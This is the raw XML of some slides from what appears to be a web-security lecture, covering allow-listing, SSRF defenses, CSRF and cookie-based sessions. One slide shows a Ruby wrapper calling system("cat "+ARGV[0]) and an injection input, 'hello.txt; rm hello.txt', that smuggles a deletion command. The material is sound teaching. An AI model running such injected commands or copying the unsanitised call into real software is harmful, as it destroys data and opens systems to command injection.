          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A44DB6F-0230-8134-9C4E-E0C3CD77A218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83025A60-CC54-63A9-5CC5-7693B93BC6BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Shape 501">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17F9BCE3-528D-D5F7-192A-19DEC7F85E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897052" y="10695489"/>
            <a:ext cx="16589896" cy="1558355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>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a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; rm </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>illegal argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Shape 503">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31ECEF00-E1D4-D5E1-3A0A-297DE62FFB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15151962" y="5552654"/>
            <a:ext cx="5586682" cy="242888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a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>reject inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>that do not mention a legal file name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028733F8-A4A3-3D09-3C4D-F21DCEA5E332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7234600" y="2519541"/>
            <a:ext cx="9896939"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000" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Check that input known to be safe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 499">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129CA777-2BD5-D213-E85D-7D3ED2072750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227885" y="8510163"/>
            <a:ext cx="8534600" cy="78365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a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  system("cat "+ARGV[0])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30031727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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="503"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="503"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50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01">
                                            <p:bg/>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50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0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01" grpId="0" uiExpand="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="503"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66014-0F39-AE58-1E14-BD4B123B5C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274618" y="625078"/>
            <a:ext cx="22028727" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-Side Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEC89D5-6D18-3EAE-6693-9BEA2BD75D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14159345" y="3134320"/>
            <a:ext cx="9464912" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow-list of destination URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In application, or via firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use block-list to protect internal URLs if allow-list cannot be enumerated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate untrusted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Valid IP address, domain name, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3039C920-D03C-5BE8-7573-05ECA2B18856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="SSRF Common Flow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4374082F-B6DC-FB73-07C2-1FFA71548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682" y="3086657"/>
            <a:ext cx="11455797" cy="938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7601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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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Cross-Site Request Forgery (CSRF)"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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HTTP is stateless"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836545" y="592542"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>HTTP is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>stateless</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="The lifetime of an HTTP session is typically:…"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836545" y="3170896"/>
            <a:ext cx="15609095" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The lifetime of an HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> is typically:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Client connects to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Client issues a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Server responds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Client issues a request for something in the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>…. repeat ….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Client disconnects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>HTTP has no means of noting “oh this is the same client from that previous session”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>How is it you don’t have to log in at every page load?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3565525878"/>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4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44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44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44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44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44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44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AD3FD-A0C5-9CBD-DE07-847DF413F305}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Statefulness with Cookies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EC2F40-F30D-CFAA-5900-377E45111187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="465184"/>
            <a:ext cx="15609094" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="554990">
              <a:defRPr sz="10640"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Statefulness</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>ookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Browser">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3907D0E3-E1F3-F3C0-8FE3-5645C0794BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="3652780"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Web server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BAC811-98D5-33D6-6755-0C6853D33ACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="3652780"/>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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Client">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B0D6FE-6542-0219-2DE4-3F08F304520D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="2564475"/>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519" name="Server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F60C531-92DA-C7AF-2D7C-965618C43768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15729938" y="2564475"/>
            <a:ext cx="19900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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="522" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{441A3CF6-C152-EF0B-38DC-7AE186181118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9419239" y="4827414"/>
            <a:ext cx="5545523" cy="1115058"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="520" name="Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D8571D-9B9C-4D2B-6C13-46A7FC66FFCF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1524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521" name="HTTP Response">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D64C17-46CD-7948-08FD-706FB001AE95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="401036" y="2976"/>
              <a:ext cx="4743451"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HTTP Response</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="525" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208D4B81-4A26-2925-3E23-376398A69591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9419239" y="3547243"/>
            <a:ext cx="5545523" cy="1115058"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="523" name="Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDDCBF9-D1FE-3A99-6F5F-058440C402C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152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524" name="HTTP Request">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA911237-13F0-ADFC-8A68-33A55C237103}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="648051" y="2976"/>
              <a:ext cx="4249421"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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="State">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FE59571-A8E7-4E45-D9E1-A1C12F26A9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19159106" y="5324767"/>
            <a:ext cx="1804084" cy="1118034"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17039"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="529" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D4B7A7-8B3C-4095-7ACA-B6CF8E63AC90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="18600690" y="3874201"/>
            <a:ext cx="1804084" cy="1777934"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1804082" cy="1777933"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="527" name="Cookie">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC3E3BD0-279B-9481-9E44-636B05FFFC42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1804083" cy="1118034"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 17039"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId4"/>
              <a:srcRect/>
              <a:tile tx="0" ty="0" sx="100000" sy="100000" flip="none" algn="tl"/>
            </a:blipFill>
